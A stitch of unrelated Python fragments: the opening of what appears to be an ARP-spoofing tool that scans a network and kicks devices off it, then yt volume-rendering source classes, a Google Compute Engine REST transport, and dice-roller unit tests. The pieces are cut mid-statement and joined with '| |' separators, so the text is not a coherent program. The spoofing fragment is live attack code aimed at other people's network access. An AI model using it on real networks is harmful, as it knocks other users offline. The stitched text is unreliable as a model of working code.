spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress)
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
# kick one device
def kickoneoff():
os.system("clear||cls")
print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Online IPs: ")
for i in | |
self.sampler(self.volume)
mylog.debug("Done casting rays")
self.finalize_image(camera)
self.current_image = self.apply_colormap()
zbuffer += ZBuffer(self.current_image.astype("float64"), self.sampler.azbuffer)
zbuffer.rgba = ImageArray(zbuffer.rgba)
self.zbuffer = zbuffer
self.current_image = self.zbuffer.rgba
if self._annotate_mesh:
self.current_image = self.annotate_mesh_lines(
self._mesh_line_color, self._mesh_line_alpha
)
return self.current_image
def finalize_image(self, camera):
sam = self.sampler
# reshape data
Nx = camera.resolution[0]
Ny = camera.resolution[1]
self.data = sam.aimage[:, :, 0].reshape(Nx, Ny)
def annotate_mesh_lines(self, color=None, alpha=1.0):
r"""
Modifies this MeshSource by drawing the mesh lines.
This modifies the current image by drawing the element
boundaries and returns the modified image.
Parameters
----------
color: array_like of shape (4,), optional
The RGBA value to use to draw the mesh lines.
Default is black.
alpha : float, optional
The opacity of the mesh lines. Default is 255 (solid).
"""
self.annotate_mesh = True
self._mesh_line_color = color
self._mesh_line_alpha = alpha
if color is None:
color = np.array([0, 0, 0, alpha])
locs = (self.sampler.amesh_lines == 1,)
self.current_image[:, :, 0][locs] = color[0]
self.current_image[:, :, 1][locs] = color[1]
self.current_image[:, :, 2][locs] = color[2]
self.current_image[:, :, 3][locs] = color[3]
return self.current_image
def apply_colormap(self):
"""
Applies a colormap to the current image without re-rendering.
Returns
-------
current_image : A new image with the specified color scale applied to
the underlying data.
"""
image = (
apply_colormap(
self.data, color_bounds=self._color_bounds, cmap_name=self._cmap
)
/ 255.0
)
alpha = image[:, :, 3]
alpha[self.sampler.aimage_used == -1] = 0.0
image[:, :, 3] = alpha
return image
def __repr__(self):
disp = f"<Mesh Source>:{str(self.data_source)} "
return disp
class PointSource(OpaqueSource):
r"""A rendering source of opaque points in the scene.
This class provides a mechanism for adding points to a scene; these
points will be opaque, and can also be colored.
Parameters
----------
positions: array_like of shape (N, 3)
The positions of points to be added to the scene. If specified with no
units, the positions will be assumed to be in code units.
colors : array_like of shape (N, 4), optional
The colors of the points, including an alpha channel, in floating
point running from 0..1.
color_stride : int, optional
The stride with which to access the colors when putting them on the
scene.
radii : array_like of shape (N), optional
The radii of the points in the final image, in pixels (int)
Examples
--------
This example creates a volume rendering and adds 1000 random points to
the image:
>>> import yt
>>> import numpy as np
>>> from yt.visualization.volume_rendering.api import PointSource
>>> from yt.units import kpc
>>> ds = yt.load("IsolatedGalaxy/galaxy0030/galaxy0030")
>>> im, sc = yt.volume_render(ds)
>>> npoints = 1000
>>> vertices = np.random.random([npoints, 3]) * 1000 * kpc
>>> colors = np.random.random([npoints, 4])
>>> colors[:, 3] = 1.0
>>> points = PointSource(vertices, colors=colors)
>>> sc.add_source(points)
>>> im = sc.render()
"""
_image = None
data_source = None
def __init__(self, positions, colors=None, color_stride=1, radii=None):
assert positions.ndim == 2 and positions.shape[1] == 3
if colors is not None:
assert colors.ndim == 2 and colors.shape[1] == 4
assert colors.shape[0] == positions.shape[0]
if not is_sequence(radii):
if radii is not None: # broadcast the value
radii = radii * np.ones(positions.shape[0], dtype="int64")
else: # default radii to 0 pixels (i.e. point is 1 pixel wide)
radii = np.zeros(positions.shape[0], dtype="int64")
else:
assert radii.ndim == 1
assert radii.shape[0] == positions.shape[0]
self.positions = positions
# If colors aren't individually set, make black with full opacity
if colors is None:
colors = np.ones((len(positions), 4))
self.colors = colors
self.color_stride = color_stride
self.radii = radii
def render(self, camera, zbuffer=None):
"""Renders an image using the provided camera
Parameters
----------
camera: :class:`yt.visualization.volume_rendering.camera.Camera`
A volume rendering camera. Can be any type of camera.
zbuffer: :class:`yt.visualization.volume_rendering.zbuffer_array.Zbuffer`
A zbuffer array. This is used for opaque sources to determine the
z position of the source relative to other sources. Only useful if
you are manually calling render on multiple sources. Scene.render
uses this internally.
Returns
-------
A :class:`yt.data_objects.image_array.ImageArray` containing
the rendered image.
"""
vertices = self.positions
if zbuffer is None:
empty = camera.lens.new_image(camera)
z = np.empty(empty.shape[:2], dtype="float64")
empty[:] = 0.0
z[:] = np.inf
zbuffer = ZBuffer(empty, z)
else:
empty = zbuffer.rgba
z = zbuffer.z
# DRAW SOME POINTS
camera.lens.setup_box_properties(camera)
px, py, dz = camera.lens.project_to_plane(camera, vertices)
zpoints(empty, z, px, py, dz, self.colors, self.radii, self.color_stride)
self.zbuffer = zbuffer
return zbuffer
def __repr__(self):
disp = "<Point Source>"
return disp
class LineSource(OpaqueSource):
r"""A render source for a sequence of opaque line segments.
This class provides a mechanism for adding lines to a scene; these
points will be opaque, and can also be colored.
.. note::
If adding a LineSource to your rendering causes the image to appear
blank or fades a VolumeSource, try lowering the values specified in
the alpha channel of the ``colors`` array.
Parameters
----------
positions: array_like of shape (N, 2, 3)
The positions of the starting and stopping points for each line.
For example,positions[0][0] and positions[0][1] would give the (x, y, z)
coordinates of the beginning and end points of the first line,
respectively. If specified with no units, assumed to be in code units.
colors : array_like of shape (N, 4), optional
The colors of the points, including an alpha channel, in floating
point running from 0..1. The four channels correspond to r, g, b, and
alpha values. Note that they correspond to the line segment succeeding
each point; this means that strictly speaking they need only be (N-1)
in length.
color_stride : int, optional
The stride with which to access the colors when putting them on the
scene.
Examples
--------
This example creates a volume rendering and then adds some random lines
to the image:
>>> import yt
>>> import numpy as np
>>> from yt.visualization.volume_rendering.api import LineSource
>>> from yt.units import kpc
>>> ds = yt.load("IsolatedGalaxy/galaxy0030/galaxy0030")
>>> im, sc = yt.volume_render(ds)
>>> nlines = 4
>>> vertices = np.random.random([nlines, 2, 3]) * 600 * kpc
>>> colors = np.random.random([nlines, 4])
>>> colors[:, 3] = 1.0
>>> lines = LineSource(vertices, colors)
>>> sc.add_source(lines)
>>> im = sc.render()
"""
_image = None
data_source = None
def __init__(self, positions, colors=None, color_stride=1):
super().__init__()
assert positions.ndim == 3
assert positions.shape[1] == 2
assert positions.shape[2] == 3
if colors is not None:
assert colors.ndim == 2
assert colors.shape[1] == 4
# convert the positions to the shape expected by zlines, below
N = positions.shape[0]
self.positions = positions.reshape((2 * N, 3))
# If colors aren't individually set, make black with full opacity
if colors is None:
colors = np.ones((len(positions), 4))
self.colors = colors
self.color_stride = color_stride
def render(self, camera, zbuffer=None):
"""Renders an image using the provided camera
Parameters
----------
camera: :class:`yt.visualization.volume_rendering.camera.Camera`
A volume rendering camera. Can be any type of camera.
zbuffer: :class:`yt.visualization.volume_rendering.zbuffer_array.Zbuffer`
z position of the source relative to other sources. Only useful if
you are manually calling render on multiple sources. Scene.render
uses this internally.
Returns
-------
A :class:`yt.data_objects.image_array.ImageArray` containing
the rendered image.
"""
vertices = self.positions
if zbuffer is None:
empty = camera.lens.new_image(camera)
z = np.empty(empty.shape[:2], dtype="float64")
empty[:] = 0.0
z[:] = np.inf
zbuffer = ZBuffer(empty, z)
else:
empty = zbuffer.rgba
z = zbuffer.z
# DRAW SOME LINES
camera.lens.setup_box_properties(camera)
px, py, dz = camera.lens.project_to_plane(camera, vertices)
px = px.astype("int64")
py = py.astype("int64")
if len(px.shape) == 1:
zlines(
empty, z, px, py, dz, self.colors.astype("float64"), self.color_stride
)
else:
# For stereo-lens, two sets of pos for each eye are contained
# in px...pz
zlines(
empty,
z,
px[0, :],
py[0, :],
dz[0, :],
self.colors.astype("float64"),
self.color_stride,
)
zlines(
empty,
z,
px[1, :],
py[1, :],
dz[1, :],
self.colors.astype("float64"),
self.color_stride,
)
self.zbuffer = zbuffer
return zbuffer
def __repr__(self):
disp = "<Line Source>"
return disp
class BoxSource(LineSource):
r"""A render source for a box drawn with line segments.
This render source will draw a box, with transparent faces, in data
space coordinates. This is useful for annotations.
Parameters
----------
left_edge: array-like of shape (3,), float
The left edge coordinates of the box.
right_edge : array-like of shape (3,), float
The right edge coordinates of the box.
color : array-like of shape (4,), float, optional
The colors (including alpha) to use for | |
transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/attachDisk".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {
"forceAttach": request.force_attach,
"requestId": request.request_id,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url, json=body,)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def delete(
self,
request: compute.DeleteInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the delete method over HTTP.
Args:
request (~.compute.DeleteInstanceRequest):
The request object.
A request message for
Instances.Delete. See the method
description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
\*
`Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
\*
`Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {
"requestId": request.request_id,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.delete(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def delete_access_config(
self,
request: compute.DeleteAccessConfigInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the delete access config method over HTTP.
Args:
request (~.compute.DeleteAccessConfigInstanceRequest):
The request object.
A request message for
Instances.DeleteAccessConfig. See the
method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
\*
`Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
\*
`Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {
"networkInterface": request.network_interface,
"requestId": request.request_id,
"accessConfig": request.access_config,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def detach_disk(
self,
request: compute.DetachDiskInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the detach disk method over HTTP.
Args:
request (~.compute.DetachDiskInstanceRequest):
The request object.
A request message for
Instances.DetachDisk. See the method
description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
\*
`Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
\*
`Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/detachDisk".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {
"requestId": request.request_id,
"deviceName": request.device_name,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def get(
self,
request: compute.GetInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Instance:
r"""Call the get method over HTTP.
Args:
request (~.compute.GetInstanceRequest):
The request object.
A request message for Instances.Get.
See the method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Instance:
Represents an Instance resource.
An instance is a virtual machine that is hosted on
Google Cloud Platform. For more information, read
Virtual Machine Instances. (== resource_for
{$api_version}.instances ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.get(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Instance.from_json(response.content)
def get_guest_attributes(
self,
request: compute.GetGuestAttributesInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.GuestAttributes:
r"""Call the get guest attributes method over HTTP.
Args:
request (~.compute.GetGuestAttributesInstanceRequest):
The request object.
A request message for
Instances.GetGuestAttributes. See the
method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.GuestAttributes:
A guest attributes entry.
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/getGuestAttributes".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields corerctly rather than using only top level fields
# not required for GCE
query_params = {
"variableKey": request.variable_key,
"queryPath": request.query_path,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.get(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
| |
= o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
a5_xor_r = 0xA5 ^ r
assert a5_xor_r.bin_op == operator.__xor__
left, right = a5_xor_r.sources
assert left == ValueRoller(0xA5)
assert right == r
assert tuple(a5_xor_r.roll().outcomes()) == (0xA5 ^ o,), a5_xor_r
r_xor_a5 = r ^ 0xA5
assert r_xor_a5.bin_op == operator.__xor__
left, right = r_xor_a5.sources
assert left == r
assert right == ValueRoller(0xA5)
assert tuple(r_xor_a5.roll().outcomes()) == (o ^ 0xA5,), r_xor_a5
def test_op_or(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
a5_or_r = 0xA5 | r
assert a5_or_r.bin_op == operator.__or__
left, right = a5_or_r.sources
assert left == ValueRoller(0xA5)
assert right == r
assert tuple(a5_or_r.roll().outcomes()) == (0xA5 | o,), a5_or_r
r_or_a5 = r | 0xA5
assert r_or_a5.bin_op == operator.__or__
left, right = r_or_a5.sources
assert left == r
assert right == ValueRoller(0xA5)
assert tuple(r_or_a5.roll().outcomes()) == (o | 0xA5,), r_or_a5
def _test_cmp_op_helper(
self,
op_name: str,
) -> None:
import operator
__op__ = getattr(operator, f"__{op_name}__")
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
r_do_op = getattr(r, op_name)
r_op_r = r_do_op(r)
left_source, right_source = r_op_r.sources
assert left_source == r
assert right_source == r
assert tuple(r_op_r.roll().outcomes()) == (bool(__op__(o, o)),), r_op_r
r_neg = -r
r_op_r_neg = r_do_op(r_neg)
left_source, right_source = r_op_r_neg.sources
assert left_source == r
assert right_source == r_neg
assert tuple(r_op_r_neg.roll().outcomes()) == (
bool(__op__(o, -o)),
), r_op_r_neg
def test_cmp_lt(self) -> None:
self._test_cmp_op_helper(op_name="lt")
def test_cmp_le(self) -> None:
self._test_cmp_op_helper(op_name="le")
def test_cmp_eq(self) -> None:
self._test_cmp_op_helper(op_name="eq")
def test_cmp_ne(self) -> None:
self._test_cmp_op_helper(op_name="ne")
def test_cmp_gt(self) -> None:
self._test_cmp_op_helper(op_name="gt")
def test_cmp_ge(self) -> None:
self._test_cmp_op_helper(op_name="ge")
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
r = R.from_value(h, annotation=f"{o_type}")
h_mul_h = h * h
r_mul_r = r * r
for _ in range(10):
r_mul_r_roll = r_mul_r.roll()
(roll_outcome,) = r_mul_r_roll
assert roll_outcome.r == r_mul_r
assert roll_outcome.value in h_mul_h
assert r_mul_r_roll.total() in h_mul_h, r_mul_r
for o in h:
h_mul_o = h * o_type(o)
r_mul_o = r * o_type(o)
r_mul_o_roll = r_mul_o.roll()
(roll_outcome,) = r_mul_o_roll
assert roll_outcome.r == r_mul_o
assert roll_outcome.value in h_mul_o
assert r_mul_o_roll.total() in h_mul_o, r_mul_o
class TestUnarySumOpRoller:
def test_repr(self) -> None:
r_42 = R.from_value(42)
r_42_neg = -r_42
assert (
repr(r_42_neg)
== """UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=42, annotation=''),
annotation='',
)"""
)
r_d6 = R.from_value(H(6), annotation="d6")
r_d6_neg = -r_d6
assert (
repr(r_d6_neg)
== """UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=H(6), annotation='d6'),
annotation='',
)"""
)
def test_op_eq(self) -> None:
r_42 = R.from_value(42)
r_42_annotated = r_42.annotate("42")
r_42_pos = +r_42
r_42_annotated_pos = +r_42_annotated
r_42_abs = abs(r_42)
r_42_annotated_abs = abs(r_42_annotated)
assert r_42_pos == +r_42
assert r_42_annotated_pos == +r_42.annotate("42")
assert r_42_pos != r_42_annotated_pos
assert r_42_pos != r_42_abs
assert r_42_annotated_pos != r_42_annotated_abs
def test_op_neg(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_neg = -r
assert r_neg.un_op == operator.__neg__
(source,) = r_neg.sources
assert source == r, r_neg
assert tuple(r_neg.roll().outcomes()) == (-o,), r_neg
def test_op_pos(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_pos = +r
assert r_pos.un_op == operator.__pos__
(source,) = r_pos.sources
assert source == r, r_pos
assert tuple(r_pos.roll().outcomes()) == (+o,), r_pos
def test_op_abs(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_abs = abs(r)
assert r_abs.un_op == operator.__abs__
(source,) = r_abs.sources
assert source == r, r_abs
assert tuple(r_abs.roll().outcomes()) == (abs(o),), r_abs
def test_op_invert(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_inv = ~r
assert r_inv.un_op == operator.__invert__
(source,) = r_inv.sources
assert source == r, r_inv
assert tuple(r_inv.roll().outcomes()) == (~o,), r_inv
def test_even(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_even = r.is_even()
assert r_even.un_op.__name__ == "_is_even"
(source,) = r_even.sources
assert source == r, r_even
assert tuple(r_even.roll().outcomes()) == (o_type(o) % 2 == 0,), r_even
def test_odd(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_odd = r.is_odd()
assert r_odd.un_op.__name__ == "_is_odd"
(source,) = r_odd.sources
assert source == r, r_odd
assert tuple(r_odd.roll().outcomes()) == (o_type(o) % 2 != 0,), r_odd
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
h_neg = -h
r = R.from_value(h, annotation=f"{o_type}")
r_neg = -r
for _ in range(10):
r_neg_roll = r_neg.roll()
(roll_outcome,) = r_neg_roll
assert roll_outcome.r == r_neg
assert r_neg_roll.total() in h_neg, r_neg
class TestPoolRoller:
def test_repr(self) -> None:
r_4_6_8 = R.from_values(4, 6, 8)
assert (
repr(r_4_6_8)
== """PoolRoller(
sources=(
ValueRoller(value=4, annotation=''),
ValueRoller(value=6, annotation=''),
ValueRoller(value=8, annotation=''),
),
annotation='',
)"""
)
r_d4_d6_d8 = R.from_values(H(4), H(6), H(8), annotation="d4d6d8")
assert (
repr(r_d4_d6_d8)
== """PoolRoller(
sources=(
ValueRoller(value=H(4), annotation=''),
ValueRoller(value=H(6), annotation=''),
ValueRoller(value=H(8), annotation=''),
),
annotation='d4d6d8',
)"""
)
def test_op_eq(self) -> None:
r_4_6_8 = R.from_values(4, 6, 8)
assert isinstance(r_4_6_8, PoolRoller)
r_4_6_8_annotated = r_4_6_8.annotate("4-6-8")
assert r_4_6_8 == R.from_values(4, 6, 8)
assert r_4_6_8 != r_4_6_8_annotated
assert r_4_6_8_annotated == R.from_values(4, 6, 8, annotation="4-6-8")
def test_getitem(self) -> None:
r_d4_d6_d8 = R.from_values(H(4), H(6), H(8))
assert len(r_d4_d6_d8.sources) == 3, r_d4_d6_d8
assert isinstance(r_d4_d6_d8.sources[0], ValueRoller)
assert r_d4_d6_d8.sources[0].value == H(4)
assert isinstance(r_d4_d6_d8.sources[1], ValueRoller)
assert r_d4_d6_d8.sources[1].value == H(6)
assert isinstance(r_d4_d6_d8.sources[2], ValueRoller)
assert r_d4_d6_d8.sources[2].value == H(8)
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
h_3 = 3 @ h
r = R.from_value(h, annotation=f"{o_type}")
r_3 = R.from_sources(r, r, r)
for _ in range(10):
r_3_roll = r_3.roll()
assert len(r_3_roll) == 3, r_3_roll
for roll_outcome in r_3_roll:
assert roll_outcome.r == r
assert r_3_roll.total() in h_3, r_3_roll
class TestSelectRoller:
def test_repr(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1)
assert (
repr(r_squares_select)
== """SelectionRoller(
which=(0, -1),
sources=(
PoolRoller(
sources=(
ValueRoller(value=36, annotation=''),
ValueRoller(value=25, annotation=''),
ValueRoller(value=16, annotation=''),
ValueRoller(value=9, annotation=''),
ValueRoller(value=4, annotation=''),
ValueRoller(value=1, annotation=''),
),
annotation='',
),
),
annotation='',
)"""
)
def test_op_eq(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1, 1, -2)
r_squares_select_annotated = r_squares_select.annotate("0, -1, 1, 2")
assert r_squares_select == r_squares.select(0, -1, 1, -2)
assert r_squares_select != r_squares_select_annotated
assert r_squares_select_annotated == r_squares_select.annotate("0, -1, 1, 2")
def test_roll(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1, 1, -2)
r_squares_select_roll = r_squares_select.roll()
assert tuple(r_squares_select_roll.outcomes()) == (1, 36, 4, 25)
for roll_outcome in r_squares_select_roll:
if roll_outcome.value is None:
assert roll_outcome.r is r_squares_select
else:
assert roll_outcome.r in r_squares.sources
class TestRoll:
def test_repr(self) -> None:
r_42 = R.from_value(42)
r_42_neg = -r_42
r_42_neg_roll = r_42_neg.roll()
assert (
repr(r_42_neg_roll)
== """Roll(
r=UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=42, annotation=''),
annotation='',
),
roll_outcomes=(
RollOutcome(
value=-42,
sources=(
RollOutcome(
value=42,
sources=(),
),
),
),
),
source_rolls=(
Roll(
r=ValueRoller(value=42, annotation=''),
roll_outcomes=(
RollOutcome(
value=42,
sources=(),
),
),
source_rolls=(),
),
),
)"""
)
def test_getitem(self) -> None:
r_123 = R.from_values(1, 2, 3)
r_123_roll = r_123.roll()
assert len(r_123_roll) == 3, r_123_roll
assert (
r_123_roll[:]
== tuple(r_123_roll[i] for i in range(len(r_123_roll)))
== tuple(r_123_roll)
)
def test_hierarchy(self) -> None:
d6 = H(6)
r_d6 = R.from_value(d6)
d6_mul2 = 2 * d6
r_d6_mul2 = 2 * r_d6
d6_mul2_neg = -d6_mul2
r_d6_mul2_neg = -r_d6_mul2
d6_mul2_neg_add4 = d6_mul2_neg + 4
r_d6_mul2_neg_add4 = r_d6_mul2_neg + 4
d6_mul2_neg_add4_3 = 3 @ d6_mul2_neg_add4
r_d6_mul2_neg_add4_3 = 3 @ r_d6_mul2_neg_add4
r_d6_mul2_neg_add4_3_roll = r_d6_mul2_neg_add4_3.roll()
assert r_d6_mul2_neg_add4_3_roll.total() in d6_mul2_neg_add4_3
assert len(r_d6_mul2_neg_add4_3_roll) == 3, r_d6_mul2_neg_add4_3_roll
for r_d6_mul2_neg_add4_roll in r_d6_mul2_neg_add4_3_roll.source_rolls:
(r_d6_mul2_neg_add4_ro,) = r_d6_mul2_neg_add4_roll
assert r_d6_mul2_neg_add4_ro.value in d6_mul2_neg_add4
(r_d6_mul2_neg_roll, _) = r_d6_mul2_neg_add4_roll.source_rolls
(r_d6_mul2_neg_ro,) = r_d6_mul2_neg_roll
assert r_d6_mul2_neg_ro.value in d6_mul2_neg
(r_d6_mul2_roll,) = r_d6_mul2_neg_roll.source_rolls
(r_d6_mul2_ro,) = r_d6_mul2_roll
assert r_d6_mul2_ro.value in d6_mul2
(r_d6_roll, _) = r_d6_mul2_roll.source_rolls
(r_d6_ro,) = r_d6_roll
assert r_d6_ro.value in d6
for r_d6_mul2_neg_add4_3_ro in r_d6_mul2_neg_add4_3_roll:
assert r_d6_mul2_neg_add4_3_ro.r == r_d6_mul2_neg_add4
(r_d6_mul2_neg_ro, _) = r_d6_mul2_neg_add4_3_ro.sources
assert r_d6_mul2_neg_ro.r == r_d6_mul2_neg
(r_d6_mul2_ro,) = r_d6_mul2_neg_ro.sources
assert r_d6_mul2_ro.r == r_d6_mul2
(_, r_d6_ro) = r_d6_mul2_ro.sources
assert r_d6_ro.r == r_d6
